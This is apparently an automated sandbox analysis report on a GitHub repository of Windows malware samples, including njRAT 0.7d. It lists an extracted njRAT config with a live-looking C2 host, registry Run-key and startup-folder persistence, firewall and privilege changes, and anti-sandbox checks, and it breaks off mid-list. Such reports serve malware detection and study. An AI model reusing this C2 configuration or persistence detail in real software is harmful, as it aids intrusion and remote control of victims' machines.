Analysis
-
max time kernel
425s -
max time network
509s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 12:51
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Viper4K/malware/tree/master/MEMZ
Resource
win10v2004-20241007-en
Errors
General
-
Target
https://github.com/Viper4K/malware/tree/master/MEMZ
Malware Config
Extracted
njrat
0.7d
Slaves
hom135.ddns.net:100
d4903fdacbb79e6cd1109a741a2bc821
d4903fdacbb79e6cd1109a741a2bc821
-
reg_key
d4903fdacbb79e6cd1109a741a2bc821
-
splitter
|'|'|
Signatures
-
Njrat family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4716 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation M.exe -
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4903fdacbb79e6cd1109a741a2bc821.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4903fdacbb79e6cd1109a741a2bc821.exe server.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\x.vbs taskmgr.exe -
Executes dropped EXE 5 IoCs
pid Process 3944 M.exe 3728 M.exe 1436 server.exe 4888 server.exe 1528 A4C3D1C6E1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d4903fdacbb79e6cd1109a741a2bc821 = "\"C:\\Users\\Admin\\AppData\\Roaming\\server.exe\" .." server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\d4903fdacbb79e6cd1109a741a2bc821 = "\"C:\\Users\\Admin\\AppData\\Roaming\\server.exe\" .." server.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" 1002.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" A4C3D1C6E1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" A4C3D1C6E1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" NjRAT 0.7d.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" 1002.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" 1003.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" 1003.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 666.exe File opened (read-only) \??\S: 666.exe File opened (read-only) \??\B: MasterSlave.exe File opened (read-only) \??\T: MasterSlave.exe File opened (read-only) \??\N: 666.exe File opened (read-only) \??\Q: 666.exe File opened (read-only) \??\N: MasterSlave.exe File opened (read-only) \??\S: MasterSlave.exe File opened (read-only) \??\A: 666.exe File opened (read-only) \??\E: 666.exe File opened (read-only) \??\G: 666.exe File opened (read-only) \??\L: 666.exe File opened (read-only) \??\U: MasterSlave.exe File opened (read-only) \??\W: MasterSlave.exe File opened (read-only) \??\Y: 666.exe File opened (read-only) \??\H: MasterSlave.exe File opened (read-only) \??\Q: MasterSlave.exe File opened (read-only) \??\B: 666.exe File opened (read-only) \??\M: 666.exe File opened (read-only) \??\O: 666.exe File opened (read-only) \??\U: 666.exe File opened (read-only) \??\W: 666.exe File opened (read-only) \??\A: MasterSlave.exe File opened (read-only) \??\K: MasterSlave.exe File opened (read-only) \??\J: 666.exe File opened (read-only) \??\X: MasterSlave.exe File opened (read-only) \??\I: MasterSlave.exe File opened (read-only) \??\L: MasterSlave.exe File opened (read-only) \??\P: MasterSlave.exe File opened (read-only) \??\K: 666.exe File opened (read-only) \??\R: 666.exe File opened (read-only) \??\X: 666.exe File opened (read-only) \??\E: MasterSlave.exe File opened (read-only) \??\M: MasterSlave.exe File opened (read-only) \??\V: MasterSlave.exe File opened (read-only) \??\I: 666.exe File opened (read-only) \??\T: 666.exe File opened (read-only) \??\Z: 666.exe File opened (read-only) \??\J: MasterSlave.exe File opened (read-only) \??\R: MasterSlave.exe File opened (read-only) \??\Y: MasterSlave.exe File opened (read-only) \??\Z: MasterSlave.exe File opened (read-only) \??\H: 666.exe File opened (read-only) \??\V: 666.exe File opened (read-only) \??\G: MasterSlave.exe File opened (read-only) \??\O: MasterSlave.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/1872-645-0x0000000000400000-0x00000000004B8000-memory.dmp autoit_exe behavioral1/memory/1872-661-0x0000000000400000-0x00000000004B8000-memory.dmp autoit_exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3944 set thread context of 3728 3944 M.exe 130 PID 1436 set thread context of 4888 1436 server.exe 135 -
resource yara_rule behavioral1/memory/3944-377-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/files/0x0008000000023de8-376.dat upx behavioral1/memory/3944-417-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/memory/1436-434-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/memory/1872-640-0x0000000000400000-0x00000000004B8000-memory.dmp upx behavioral1/memory/1872-645-0x0000000000400000-0x00000000004B8000-memory.dmp upx behavioral1/memory/1872-661-0x0000000000400000-0x00000000004B8000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 1 IoCs
pid pid_target Process procid_target 5552 1800 WerFault.exe 200 -
System Location Discovery: System Language Discovery 1 TTPs 32 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Backdoor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MasterSlave.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NjRAT 0.7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Backdoor(na).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Backdoor(na)(np).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MasterSlave.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Backdoor(np).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MasterSlave.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkHorseTrojanVirusMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DELmE_s Batch Virus Generator v 2.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 666.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5900 PING.EXE 5664 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 4344 taskkill.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\InprocServer32\ = "C:\\Users\\Admin\\Downloads\\malware-master\\malware-master\\DarkHorse VM\\COMCTL32.OCX" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{612A8626-0FB3-11CE-8747-524153480004}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B7E6390-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA60-E020-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8556BCD0-E01E-11CF-8E74-00A0C90F26F8} DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\ProgID DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E451-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.TreeCtrl\ = "Microsoft TreeView Control, version 5.0 (SP2)" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\MiscStatus\ = "0" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E84-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A3-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D94-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Slider\CurVer\ = "COMCTL.Slider.1" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ProgID DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A5-850A-101B-AFC0-4210102A8DA7} DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877896-E026-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\TypeLib DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.TreeCtrl\CurVer DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D96-9D6A-101B-AFC0-4210102A8DA7}\InprocServer32 DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94441-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA40-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E953-850A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8556BCD2-E01E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D95-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D90-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A} DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\ = "IControls" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7} DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\MiscStatus DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\Control DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ = "Microsoft ProgressBar Control, version 5.0 (SP2)" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\TypeLib\Version = "1.3" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94444-E5E8-101B-B9B5-444553540000}\ = "TabStrip General Property Page Object" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\VersionIndependentProgID DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8B0-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\1\ = "131473" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.SBarCtrl\CLSID DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\ = "IListItems" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\ToolboxBitmap32\ = "C:\\Users\\Admin\\Downloads\\malware-master\\malware-master\\DarkHorse VM\\COMCTL32.OCX, 4" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83603-895E-11D0-B0A6-000000000000} DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94444-E5E8-101B-B9B5-444553540000}\InprocServer32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004}\ProgID\ = "COMCTL.Toolbar.1" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{612A8625-0FB3-11CE-8747-524153480004}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\TypeLib DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8AE-850A-101B-AFC0-4210102A8DA7} DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8B1-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E944-850A-101B-AFC0-4210102A8DA7}\TypeLib DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C787A52-E01C-11CF-8E74-00A0C90F26F8}\TypeLib DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A4-850A-101B-AFC0-4210102A8DA7} DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA62-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7}\TypeLib DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B66834C6-2E60-11CE-8748-524153480004}\InprocServer32 DarkHorseTrojanVirusMaker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6027C2D4-FB28-11CD-8820-08002B2F4F5A}\InprocServer32 DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ToolboxBitmap32\ = "C:\\Users\\Admin\\Downloads\\malware-master\\malware-master\\DarkHorse VM\\COMCTL32.OCX, 17" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A4-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" DarkHorseTrojanVirusMaker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" DarkHorseTrojanVirusMaker.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5664 PING.EXE 5900 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1124 msedge.exe 1124 msedge.exe 3832 msedge.exe 3832 msedge.exe 3468 identity_helper.exe 3468 identity_helper.exe 3856 msedge.exe 3856 msedge.exe 3944 M.exe 3944 M.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1436 server.exe 1436 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 4888 server.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4888 server.exe 1872 DELmE_s Batch Virus Generator v 2.0.exe 516 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: SeManageVolumePrivilege 1484 svchost.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: SeDebugPrivilege 964 1002.exe Token: SeDebugPrivilege 4596 1003.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: SeDebugPrivilege 516 taskmgr.exe Token: SeSystemProfilePrivilege 516 taskmgr.exe Token: SeCreateGlobalPrivilege 516 taskmgr.exe Token: SeDebugPrivilege 4344 taskkill.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: SeDebugPrivilege 1528 A4C3D1C6E1.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 